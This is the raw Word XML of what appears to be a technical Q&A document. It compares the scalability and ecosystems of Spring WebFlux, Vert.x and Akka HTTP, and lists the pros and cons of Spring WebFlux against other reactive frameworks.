      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring WebFlux is highly scalable when built with non-blocking I/O using Netty or Undertow. It is suitable for building applications with high concurrency or real-time applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52646C3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The framework handles many concurrent requests with minimal resources because of its non-blocking I/O model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71992D0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1C619A0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tremely high concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Vert.x is known for its </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exceptional performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and can handle hundreds of thousands of concurrent connections with minimal resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675F87D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Its event-driven, non-blocking model is extremely efficient in handling high-throughput, I/O-bound applications. Vert.x can scale horizontally with ease.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EC0A6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385787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ly scalable</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Akka HTTP is designed for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high concurrency and scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It uses Akka Streams for backpressure handling and can scale effectively for streaming applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FFC06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With Akka's </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cluster</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> capabilities, Akka HTTP can handle distributed and highly concurrent systems across multiple nodes, which is ideal for building microservices in complex distributed environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E84AEE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s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0336569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56A5B38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building web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7133EB9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est for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high-performance, event-driven applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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305051E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distributed, event-driven applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that require high scalability, such a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applications, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message-based systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or microservices that need to deal with high-throughput and resource-efficient communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1463BAC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ommunity and Ecosystem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510046C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2A8BAE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arge community</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> support, especially among Java developers. Well-integrated into the broader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pring Boot, Spring Security, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E18067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2ABDD4E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growing popularity</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It is gaining traction, especially for lightweight, microservices-style applications. Its polyglot nature makes it popular among developers from different programming language backgrounds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9EA17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13A5983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nterprise adoption</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, especially in systems that require distributed, actor-based architectures. Akka has a mature ecosystem around </w:t>
      </w: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nd is used in highly reliable systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CC6598"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0662513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Best suited for developers already invested in the Spring ecosystem who want to build scalable, reactive applications with familiar Spring tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D33C8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Ideal for lightweight, high-performance applications that require </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>low-lat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and are built around the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model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C680D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Best for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or applications that need to scale horizontally and work with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use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784A1BA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ch of these frameworks excels in different areas, and the choice depends on your application's needs, the team's familiarity with the frameworks, and the underlying architectural goals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C0A68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336" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC1A053" w14:textId="0AD724DA"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46" w:name="_Toc197867760"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the pros and cons of using Spring WebFlux compared to other reactive frameworks</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="546"/>
    </w:p>
    <w:p w14:paraId="11F4861A" w14:textId="6CA3CA20"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offers several advantages and some trade-offs when compared to other reactive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Here's a breakdown of the </w:t>
      </w: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 xml:space="preserve"> of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6CC93CB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of Using Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2BAEF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Integration with the Spring Ecosystem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E537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eamless Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you are already using the Spring ecosystem (Spring Boot, Spring Security, Spring Data, Spring Cloud, etc.), Spring WebFlux integrates seamlessly with these tools, reducing configuration complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7983227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w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring WebFlux uses familiar Spring programming models, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>annotations</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (@RestController, @RequestMapping) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dependency injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Spring's IoC container, making it easier for teams already skilled in Spring to adopt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CD72D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mprehensive Reactive Programming Support:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BB6CA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Built on top of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactor library</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which implement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Mono and Flux), ensuring a standard approach to reactive programming across Java ecosystems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B445E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API</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The reactive streams model (using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provides a clean and declarative way to model asynchronous operations, backpressure, and concurrency, which can be easier to manage than callbacks or complex threading models.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FC263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Non-Blocking I/O (High Scalability):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C51E4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sage</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: WebFlux leverag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as servers, which are optimized for non-blocking I/O, enabling high concurrency with fewer resources compared to traditional, blocking I/O frameworks like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2CC9B64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r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When designed correctly, applications built with Spring WebFlux can handle large numbers of concurrent requests (e.g., real-time apps, chat apps) with better throughput and less CPU overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5163179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ase of Use with Functional Endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618BD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 Programming Style</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: WebFlux supports both </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>annotation-based</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> programming (e.g., @RestController) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional endpoints</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (using RouterFunctions), providing flexibility in how you design and implement routes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF580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Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Offers a clean way to handle errors and manage retries or fallbacks in a declarative fashion using operators lik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ErrorReturn</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2445052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Full Support for Reactive Data Access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E3084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Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: WebFlux works well with reactive data stor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Cassandra</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Support:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68235A8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Test Support</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Since WebFlux is part of the Spring ecosystem, it benefits from tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot Tes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which are designed for writing tests in a reactive context. Testing asynchronous components becomes easier and more structured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F552E8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Comprehensive Documentation &amp; Community:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E60AE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 Ecosystem</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring WebFlux benefits from the broad and mature </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> community, extensive documentation, tutorials, and learning resources, making it easier to get started and troubleshoot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213D9D1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terprise Support</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Being part of the Spring Framework, WebFlux is backed by </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Pivotal (VMware)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, providing enterprise-level support for mission-critical applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C0F67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s of Using Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBB1A8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mplexity for Beginners:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F57F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earning Curve</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Reactive programming concepts such a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ads (Mono, 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tream operators</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be difficult to grasp for developers unfamiliar with reactive patterns. Debugging non-blocking code can also be more challenging compared to traditional imperative code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053629E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s Understanding of Reactive Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: To effectively use WebFlux, developers need a strong understanding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principles. Transitioning from a tradition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paradigm to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one might require significant retraining for developers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F36C9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Not Always the Right Fit for Simple Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A99FAF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kill for Simple Use Cases</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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might be a simpler choice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603D468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ebugging and Tracing Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C73B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 Debugging</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Debugging and tracing issues in reactive, asynchronous code can be more difficult than in imperative code. Tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread dumps</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> might not be as effective, and the callback hell pattern might make it harder to identify where issues arise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3045C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ck Traces</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Limited Support for Blocking Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B8E79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Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: In Spring WebFlux, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking calls</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., traditional database calls, file I/O) can significantly degrade performance and negate the benefits of the non-blocking architecture. While WebFlux provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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verhead for Small, Simple Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB574F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head for Microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: WebFlux and reactive programming introduce extra complexity in microservice-based applications. In cases where simple synchronous calls are enough, using WebFlux could lead to unnecessary overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F549C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Server Overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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imited to Java Ecosystem:</w:t>
      </w:r>
    </w:p>
